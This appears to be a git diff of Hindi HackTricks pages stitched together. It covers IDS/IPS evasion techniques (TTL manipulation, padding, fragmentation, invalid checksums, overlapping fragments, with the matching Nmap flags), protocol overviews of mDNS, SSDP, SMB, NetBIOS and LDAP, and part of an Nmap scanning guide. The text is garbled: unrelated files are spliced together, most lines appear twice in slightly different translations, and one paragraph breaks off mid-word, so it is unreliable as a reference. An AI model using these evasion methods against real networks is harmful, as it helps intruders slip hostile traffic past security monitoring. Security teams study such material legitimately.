* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# **TTL मैनिपुलेशन**
|
||||
|
||||
कुछ पैकेट भेजें जिनका TTL IDS/IPS तक पहुंचने के लिए पर्याप्त हो, लेकिन अंतिम सिस्टम तक पहुंचने के लिए पर्याप्त न हो। और फिर, उन्हीं सीक्वेंस के साथ एक और पैकेट भेजें ताकि IPS/IDS सोचेगा कि वे दोहराव हैं और उन्हें जांचेगा नहीं, लेकिन वास्तव में वे दुरुपयोगी सामग्री ले जा रहे हैं।
|
||||
कुछ पैकेट भेजें जिनका TTL IDS/IPS तक पहुंचने के लिए पर्याप्त हो, लेकिन अंतिम सिस्टम तक पहुंचने के लिए पर्याप्त न हो। और फिर, उन्हें दूसरे पैकेट भेजें जिनकी सीक्वेंस उन अन्य पैकेटों के समान हो ताकि IPS/IDS यह सोचें कि वे दोहराव हैं और उन्हें जांचेंगे नहीं, लेकिन वास्तव में वे दुष्ट सामग्री ले जा रहे हैं।
|
||||
|
||||
**Nmap विकल्प:** `--ttlvalue <मान>`
|
||||
|
||||
# हस्ताक्षरों से बचें
|
||||
|
||||
पैकेट में कचरा डेटा जोड़ें ताकि IPS/IDS हस्ताक्षर को टाल दें।
|
||||
पैकेट में कचरा डेटा जोड़ें ताकि IPS/IDS हस्ताक्षर को टाल सकें।
|
||||
|
||||
**Nmap विकल्प:** `--data-length 25`
|
||||
|
||||
# **विभाजित पैकेट्स**
|
||||
|
||||
पैकेट को विभाजित करें और भेजें। यदि IDS/IPS को उन्हें पुनर्गठित करने की क्षमता नहीं है, तो वे अंतिम होस्ट तक पहुंचेंगे।
|
||||
पैकेट को विभाजित करें और उन्हें भेजें। यदि IDS/IPS को उन्हें पुनर्गठित करने की क्षमता नहीं है, तो वे अंतिम होस्ट तक पहुंचेंगे।
|
||||
|
||||
**Nmap विकल्प:** `-f`
|
||||
|
||||
# **अमान्य** _**चेकसम**_
|
||||
|
||||
सेंसर आम तौर पर प्रदर्शन कारणों के लिए चेकसम की गणना नहीं करते। इसलिए एक हमलावर एक पैकेट भेज सकता है जो **सेंसर द्वारा व्याख्या किया जाएगा लेकिन अंतिम होस्ट द्वारा अस्वीकृत किया जाएगा।** उदाहरण:
|
||||
सेंसर्स सामर्थ्य कारणों के लिए चेकसम की गणना नहीं करते हैं। इसलिए एक हमलावर एक पैकेट भेज सकता है जो सेंसर द्वारा व्याख्या किया जाएगा लेकिन अंतिम होस्ट द्वारा अस्वीकृत किया जाएगा। उदाहरण:
|
||||
|
||||
एक पैकेट भेजें जिसमें RST फ्लैग और एक अमान्य चेकसम हो, ताकि फिर, IPS/IDS यह सोच सकता है कि यह पैकेट कनेक्शन बंद करने जा रहा है, लेकिन अंतिम होस्ट चेकसम अमान्य होने के कारण पैकेट को खारिज कर देगा।
|
||||
एक पैकेट भेजें जिसमें RST फ्लैग और एक अमान्य चेकसम हो, तो फिर, IPS/IDS यह सोच सकते हैं कि यह पैकेट कनेक्शन बंद करने जा रहा है, लेकिन अंतिम होस्ट चेकसम अमान्य होने के कारण पैकेट को खारिज कर देगा।
|
||||
|
||||
# **असामान्य IP और TCP विकल्प**
|
||||
# **असामान्य आईपी और TCP विकल्प**
|
||||
|
||||
एक सेंसर संभावित है कि IP और TCP हेडर्स के भीतर निर्दिष्ट ध्वज और विकल्पों वाले पैकेट्स को नजरअंदाज करेगा, जबकि गंतव्य होस्ट पैकेट को प्राप्त करने पर स्वीकार करेगा।
|
||||
एक सेंसर ऐसे आईपी और TCP हेडर्स के भीतर निर्धारित ध्वज और विकल्पों वाले पैकेट्स को नजरअंदाज कर सकता है, जबकि गंतव्य होस्ट पैकेट को प्राप्त करने पर स्वीकार करता है।
|
||||
|
||||
# **ओवरलैपिंग**
|
||||
|
||||
संभावना है कि जब आप एक पैकेट को विभाजित करते हैं, पैकेटों के बीच किसी प्रकार का ओवरलैपिंग हो (शायद पैकेट 2 के पहले 8 बाइट पैकेट 1 के आखिरी 8 बाइट के साथ ओवरलैप होता है, और पैकेट 2 के आखिरी 8 बाइट पैकेट 3 के पहले 8 बाइट के साथ ओवरलैप होता है)। फिर, यदि IDS/IPS उन्हें एक अलग तरीके से पुनर्गठित करता है जैसा कि अंतिम होस्ट, तो एक भिन्न पैकेट का व्याख्यान होगा।\
|
||||
या शायद, 2 पैकेट्स जिनका समान ऑफसेट है आते हैं और होस्ट को यह निर्णय लेना होता है कि वह किसे लेता है।
|
||||
संभावना है कि जब आप एक पैकेट को विभाजित करते हैं, पैकेटों के बीच कुछ प्रकार का ओवरलैपिंग हो (शायद पैकेट 2 के पहले 8 बाइट पैकेट 1 के आखिरी 8 बाइट के साथ ओवरलैप होता है, और पैकेट 2 के आखिरी 8 बाइट पैकेट 3 के पहले 8 बाइट के साथ ओवरलैप होता है)। फिर, यदि IDS/IPS उन्हें अलग-अलग तरीके से पुनर्गठित करता है, तो एक भिन्न पैकेट व्याख्या किया जाएगा।\
|
||||
या शायद, 2 पैकेट्स एक ही ऑफसेट के साथ आते हैं और होस्ट को यह निर्णय लेना होता है कि वह किसे लेता है।
|
||||
|
||||
* **BSD**: यह पैकेट्स के लिए छोटे _ऑफसेट_ वाले पैकेट्स की प्राथमिकता रखता है। समान ऑफसेट वाले पैकेट्स के लिए, यह पहला चुनेगा।
|
||||
* **Linux**: BSD की तरह, लेकिन यह अंतिम पैकेट को अधिक पसंद करता है जिसका समान ऑफसेट है।
|
||||
* **पहला** (Windows): जो मान आता है, वह मान रहा है।
|
||||
* **अंतिम** (सिस्को): जो मान आता है, वह मान रहा है।
|
||||
* **बीएसडी**: यह पैकेट्स के छोटे _ऑफसेट_ वाले पैकेट्स की प्राथमिकता रखता है। एक ही ऑफसेट वाले पैकेट्स के लिए, यह पहला चुनेगा।
|
||||
* **लिनक्स**: बीएसडी की तरह, लेकिन यह अंतिम पैकेट को अधिक पसंद करता है जिसमें एक ही ऑफसेट है।
|
||||
* **पहला** (विंडोज): जो मान पहला आता है, वह मान बना रहता है।
|
||||
* **अंतिम** (सिस्को): जो मान अंतिम आता है, वह मान बना रहता है।
|
||||
|
||||
# उपकरण
|
||||
|
||||
* [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,55 +1,57 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## Multicast DNS (mDNS)
|
||||
## मल्टीकास्ट DNS (mDNS)
|
||||
|
||||
**mDNS** प्रोटोकॉल एक विशेषित नाम सर्वर के बिना छोटे, स्थानीय नेटवर्क में IP पता सुलझाने के लिए डिज़ाइन किया गया है। यह सबनेट के भीतर एक क्वेरी को मल्टीकास्ट करके संचालित होता है, जिससे निर्दिष्ट नाम वाले होस्ट को अपना IP पता देने के लिए प्रोत्साहित किया जाता है। इस सूचना के साथ सभी उपकरण स्वयं अपने mDNS कैश को अपडेट कर सकते हैं।
|
||||
**mDNS** प्रोटोकॉल एक डेडिकेटेड नेम सर्वर के बिना छोटे, स्थानीय नेटवर्क में आईपी पता सुलझाने के लिए डिज़ाइन किया गया है। यह सबनेट के भीतर एक क्वेरी को मल्टीकास्ट करके ऑपरेट करता है, जिससे निर्दिष्ट नाम वाले होस्ट से उसका आईपी पता प्रतिसाद देने के लिए प्रोत्साहित किया जाता है। इस जानकारी के साथ सबनेट में सभी उपकरण फिर अपने mDNS कैश को अपडेट कर सकते हैं।
|
||||
|
||||
महत्वपूर्ण बिंदुओं को ध्यान में रखें:
|
||||
- **डोमेन नाम त्यागना**: एक होस्ट अपना डोमेन नाम जारी कर सकता है जब वह जीरो की TTL के साथ एक पैकेट भेजता है।
|
||||
- **उपयोग प्रतिबंध**: mDNS सामान्यत: केवल **.local** समाप्त होने वाले नामों को सुलझाता है। इस डोमेन में गैर-mDNS होस्ट्स के साथ संघर्ष के लिए नेटवर्क कॉन्फ़िगरेशन समायोजन की आवश्यकता होती है।
|
||||
- **डोमेन नाम त्यागना**: एक होस्ट अपना डोमेन नाम जारी कर सकता है जब वह एक जीरो के TTL के साथ एक पैकेट भेजता है।
|
||||
- **उपयोग प्रतिबंध**: mDNS आम तौर पर केवल **.local** समाप्त होने वाले नामों को सुलझाता है। इस डोमेन में गैर-mDNS होस्ट्स के साथ संघर्ष के लिए नेटवर्क कॉन्फ़िगरेशन समायोजन की आवश्यकता होती है।
|
||||
- **नेटवर्किंग विवरण**:
|
||||
- ईथरनेट मल्टीकास्ट MAC पते: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`।
|
||||
- IP पते: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`।
|
||||
- UDP पोर्ट 5353 पर संचालित होता है।
|
||||
- mDNS क्वेरी स्थानीय नेटवर्क में सीमित होती है और राउटर्स को पार नहीं करती।
|
||||
- आईपी पते: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`।
|
||||
- UDP पोर्ट 5353 पर ऑपरेट करता है।
|
||||
- mDNS क्वेरी स्थानीय नेटवर्क में सीमित होती है और राउटर्स को पार नहीं करती है।
|
||||
|
||||
## DNS-SD (सेवा खोज)
|
||||
|
||||
DNS-SD एक प्रोटोकॉल है जो नेटवर्क पर सेवाओं को खोजने के लिए विशिष्ट डोमेन नामों (जैसे, `_printers._tcp.local`) का क्वेरी करके काम करता है। एक प्रतिक्रिया में सभी संबंधित डोमेन शामिल होते हैं, जैसे इस मामले में उपलब्ध प्रिंटर। एक समग्र सेवा प्रकारों की सूची [यहाँ](http://www.dns-sd.org/ServiceTypes.html) मिल सकती है।
|
||||
DNS-SD एक प्रोटोकॉल है जो नेटवर्क पर सेवाओं को खोजने के लिए विशिष्ट डोमेन नामों (जैसे, `_printers._tcp.local`) क्वेरी करके डिस्कवरी करता है। एक प्रतिक्रिया में सभी संबंधित डोमेन शामिल होते हैं, जैसे इस मामले में उपलब्ध प्रिंटर। एक समग्र सेवा प्रकारों की सूची [यहाँ](http://www.dns-sd.org/ServiceTypes.html) मिल सकती है।
|
||||
|
||||
## SSDP (सिम्पल सेवा खोज प्रोटोकॉल)
|
||||
## SSDP (सिम्पल सेवा डिस्कवरी प्रोटोकॉल)
|
||||
|
||||
SSDP नेटवर्क सेवाओं की खोज को सुविधाजनक बनाता है और मुख्य रूप से UPnP द्वारा उपयोग किया जाता है। यह एक पाठ-आधारित प्रोटोकॉल है जो UDP का उपयोग करता है (पोर्ट 1900 पर), मल्टीकास्ट पतों के साथ। IPv4 के लिए, निर्धारित मल्टीकास्ट पता है `239.255.255.250`। SSDP की आधारभूतता [HTTPU](https://en.wikipedia.org/wiki/HTTPU) है, जो UDP के लिए HTTP का एक विस्तार है।
|
||||
SSDP नेटवर्क सेवाओं की खोज को सुविधाजनक बनाता है और मुख्य रूप से UPnP द्वारा उपयोग किया जाता है। यह मल्टीकास्ट पतों का उपयोग करता है, जो UDP पर पोर्ट 1900 के माध्यम से होता है। IPv4 के लिए, निर्धारित मल्टीकास्ट पता `239.255.255.250` है। SSDP की आधारभूत बुनियाद [HTTPU](https://en.wikipedia.org/wiki/HTTPU) है, जो UDP के लिए HTTP का एक विस्तार है।
|
||||
|
||||
## उपकरणों के लिए वेब सेवा (WSD)
|
||||
नेटवर्क से जुड़े उपकरण वेब सेवा के माध्यम से उपलब्ध सेवाओं की पहचान कर सकते हैं, जैसे प्रिंटर। इसमें UDP पैकेटों को ब्रॉडकास्ट करना शामिल है। सेवाएं चाहने वाले उपकरण अनुरोध भेजते हैं, जबकि सेवा प्रदाताएं अपने प्रस्तावों की घोषणा करती हैं।
|
||||
|
||||
## डिवाइस के लिए वेब सेवा (WSD)
|
||||
नेटवर्क से जुड़े डिवाइस वेब सेवा के माध्यम से उपलब्ध सेवाओं की पहचान कर सकते हैं, जैसे प्रिंटर, इसमें UDP पैकेट्स को ब्रॉडकास्ट करना शामिल है। सेवाएं चाहने वाले डिवाइस अनुरोध भेजते हैं, जबकि सेवा प्रदाताएं अपने प्रस्तावों की घोषणा करते हैं।
|
||||
|
||||
## OAuth 2.0
|
||||
OAuth 2.0 एक प्रोटोकॉल है जो सुरक्षित, विवेकपूर्ण रूप से उपयोगकर्ता जानकारी का साझा करना सुनिश्चित करने में सहायक है। उदाहरण के लिए, यह सेवाओं को बिना कई लॉगिन किए गूगल से उपयोगकर्ता डेटा तक पहुंचने की सुविधा प्रदान करता है। इस प्रक्रिया में उपयोगकर्ता प्रमाणीकरण, उपयोगकर्ता द्वारा अधिकृति, और गूगल द्वारा टोकन उत्पादन शामिल है, जिससे सेवा निर्दिष्ट उपयोगकर्ता डेटा तक पहुंच सकती है।
|
||||
OAuth 2.0 एक प्रोटोकॉल है जो सुरक्षित, चयनित रूप से उपयोगकर्ता जानकारी का साझा करना सुनिश्चित करता है सेवाओं के बीच। उदाहरण के लिए, यह सेवाओं को बिना कई लॉगिन किए गूगल से उपयोगकर्ता डेटा तक पहुंचने की सुविधा प्रदान करता है। इस प्रक्रिया में उपयोगकर्ता प्रमाणीकरण, उपयोगकर्ता द्वारा अधिकृति, और गूगल द्वारा टोकन उत्पादन शामिल है, जो सेवा को निर्दिष्ट उपयोगकर्ता डेटा तक पहुंचने की अनुमति देता है।
|
||||
|
||||
## RADIUS
|
||||
RADIUS (Remote Authentication Dial-In User Service) एक नेटवर्क पहुंच प्रोटोकॉल है जिसका मुख्य रूप से आईएसपीएस द्वारा उपयोग किया जाता है। यह प्रमाणीकरण, अधिकृति, और लेखा समर्थन का समर्थन करता है। उपयोगकर्ता क्रेडेंशियल RADIUS सर्वर द्वारा सत्यापित किए जाते हैं, जिसमें सुरक्षा जोड़ने के लिए नेटवर्क पते सत्यापित हो सकते हैं। पोस्ट-प्रमाणीकरण, उपयोगकर्ताओं को नेटवर्क पहुंच मिलती है और उनका सत्र विवरण बिलिंग और सांख्यिकीय उद्देश्यों के लिए ट्रैक किए जाते हैं।
|
||||
RADIUS (Remote Authentication Dial-In User Service) एक नेटवर्क एक्सेस प्रोटोकॉल है जिसे मुख्य रूप से आईएसपी द्वारा उपयोग किया जाता है। यह प्रमाणीकरण, अधिकृति, और लेखा समर्थन का समर्थन करता है। उपयोगकर्ता क्रेडेंशियल RADIUS सर्वर द्वारा सत्यापित किए जाते हैं, जिसमें सुरक्षा जोड़ने के लिए नेटवर्क पते सत्यापित हो सकते हैं। पोस्ट-प्रमाणीकरण, उपयोगकर्ताओं को नेटवर्क पहुंच मिलती है और उनका सत्र विवरण बिलिंग और सांख्यिकीय उद्देश्यों के लिए ट्रैक किए जाते हैं।
|
||||
|
||||
## SMB और NetBIOS
|
||||
|
||||
### SMB (सर्वर संदेश ब्लॉक)
|
||||
SMB एक प्रोटोकॉल है जो फ़ाइल, प्रिंटर, और पोर्ट साझा करने के लिए है। यह सीधे TCP (पोर्ट 445) के माध्यम से या NetBIOS के माध्यम से TCP (पोर्ट 137, 138) के माध्यम से संचालित होता है। यह दोहरी संगतता विभिन्न उपकरणों के साथ कनेक्टिविटी को बढ़ाती है।
|
||||
### SMB (सर्वर मैसेज ब्लॉक)
|
||||
SMB एक प्रोटोकॉल है जो फ़ाइल, प्रिंटर, और पोर्ट साझा करने के लिए है। यह सीधे TCP (पोर्ट 445) पर या NetBIOS के माध्यम से TCP (पोर्ट 137, 138) के माध्यम से काम करता है। यह दोहरी संगतता विभिन्न उपकरणों के साथ कनेक्टिविटी को बढ़ाती है।
|
||||
|
||||
### NetBIOS (नेटवर्क बेसिक इनपुट/आउटपुट सिस्टम)
|
||||
NetBIOS नेटवर्क सत्र और संसाधन साझा करने के लिए नेटवर्क सत्र और कनेक्शनों का प्रबंधन करता है। यह उपकरणों के लिए अद्वितीय नामों का समर्थन करता है और एकाधिक उपकरणों के लिए समूह नामों का समर्थन करता है, लक्षित या ब्रॉडकास्ट संदेश भेजने की संभावना देता है। संचार संबंधित या सत्र-आधारित हो सकता है। जबकि NetBIOS पारंपरिक रूप से प्रोटोकॉलों जैसे IPC/IPX के माध्यम से संचालित होता है, यह आमतौर पर TCP/IP के माध्यम से उपयोग किया जाता है। NetBEUI, एक संबंधित प्रोटोकॉल, अपनी गति के लिए जाना जाता है, लेकिन ब्रॉडकास्टिंग के कारण भी काफी व्याख्यात्मक था।
|
||||
NetBIOS नेटवर्क सत्र और संयोजनों का प्रबंधन करता है रिसोर्स साझा करने के लिए। यह उपकरणों के लिए अद्वितीय नामों का समर्थन करता है और एकाधिक उपकरणों के लिए समूह नामों का समर्थन करता है, लक्षित या ब्रॉडकास्ट संदेश भेजने की संभावना देता है। संचार कनेक्शनलेस (कोई स्वीकृति नहीं) या कनेक्शन-विषयक (सत्र-आधारित) हो सकती है। जबकि NetBIOS पारंपरिक रूप से प्रोटोकॉलों के ऊपर ऑपरेट करता है जैसे IPC/IPX, यह आमतौर पर TCP/IP के ऊपर उपयोग किया जाता है। NetBEUI, एक संबंधित प्रोटोकॉल, अपनी गति के लिए जाना जाता है लेकिन ब्रॉडकास्टिंग के कारण भी काफी व्याख्यात्मक था।
|
||||
|
||||
## LDAP (लाइटवेट डायरेक्टरी एक्सेस प्रोटोकॉल)
|
||||
LDAP एक प्रोटोकॉल है जो TCP/IP के माध्यम से निर्देशिका सूचना के प्रबंधन और पहुंच को संभावित बनाता है। यह विभिन्न प्रश्नों का समर्थन करता है जिसके लिए निर्देशिका सूचना का प्रश्न
|
||||
LDAP एक प्रोटोकॉल है जो TCP/IP के माध्यम से निर्देशिका सूचना का प्रबंधन और पहुंच संभव बनाता है। यह विभिन्न प्रश्नों का समर्थन करता है जिसके लिए निर्देशिका सू
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# Nmap सारांश (ESP)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -24,39 +25,39 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
|||
|
||||
### स्कैन करने के लिए IPs
|
||||
|
||||
* **`<ip>,<net/mask>`:** IPs को सीधे इंडिकेट करें
|
||||
* **`<ip>,<net/mask>`:** सीधे IPs को दर्शाता है
|
||||
* **`-iL <ips_file>`:** सूची_IPs
|
||||
* **`-iR <number>`**: रैंडम IPs की संख्या, आप `--exclude <Ips>` या `--excludefile <file>` के साथ संभावित IPs को बाहर कर सकते हैं।
|
||||
* **`-iR <number>`**: यादृच्छिक Ips की संख्या, आप `--exclude <Ips>` या `--excludefile <file>` के साथ संभावित Ips को छोड़ सकते हैं।
|
||||
|
||||
### उपकरण खोज
|
||||
|
||||
निम्नलिखित डिस्कवरी फेज को लॉन्च करता है Nmap: `-PA80 -PS443 -PE -PP`
|
||||
निम्नलिखित डिस्कवरी चरण को लॉन्च करता है Nmap: `-PA80 -PS443 -PE -PP`
|
||||
|
||||
* **`-sL`**: यह अत्यधिक आक्रामक नहीं है, यह लक्ष्यों की सूची बनाता है जिसमें नामों को हल करने के लिए **DNS** अनुरोध किए जाते हैं। यह उपयोगी है यदि आप जानना चाहते हैं कि क्या उदाहरण के लिए www.prueba.es/24 सभी IPs हमारे लक्ष्य हैं।
|
||||
* **`-Pn`**: **कोई पिंग नहीं**। यह उपयोगी है अगर आप जानते हैं कि सभी वे सक्रिय हैं (अगर नहीं, तो आप बहुत समय खो सकते हैं, लेकिन यह विकल्प भी गलत नकारात्मक परिणाम देता है कि वे सक्रिय नहीं हैं), यह डिस्कवरी फेज को रोकता है।
|
||||
* **`-sn`** : **कोई पोर्ट स्कैन नहीं**। अनुसंधान फेज पूरा करने के बाद, यह पोर्ट स्कैन नहीं करता है। यह अपेक्षाकृत छिपकली है, और एक छोटे नेटवर्क स्कैन करने की अनुमति देता है। विशेषाधिकारों के साथ, यह 80 को ACK (-PA) भेजता है, 443 को SYN(-PS) भेजता है और एक इको अनुरोध और एक समयचिह्न अनुरोध भेजता है, बिना विशेषाधिकारों के हमेशा कनेक्शन पूरा होता है। यदि लक्ष्य नेटवर्क है, तो केवल ARP(-PR) का उपयोग किया जाता है। यदि दूसरे विकल्प के साथ उपयोग किया जाता है, तो केवल दूसरे विकल्प के पैकेट ड्रॉप किए जाते हैं।
|
||||
* **`-sL`**: यह आक्रामक नहीं है, यह लक्ष्यों की सूची बनाता है जो नामों को हल करने के लिए **DNS** अनुरोध करते हैं। यह उपयोगी है यदि आप जानना चाहते हैं कि क्या उदाहरण के लिए www.prueba.es/24 सभी Ips हमारे लक्ष्य हैं।
|
||||
* **`-Pn`**: **कोई पिंग नहीं**। यह उपयोगी है अगर आप जानते हैं कि सभी उनमें सक्रिय हैं (अगर नहीं, तो आप बहुत समय खो सकते हैं, लेकिन यह विकल्प भी गलत नकारात्मक उत्तर देता है कि वे सक्रिय नहीं हैं), यह खोज चरण को रोकता है।
|
||||
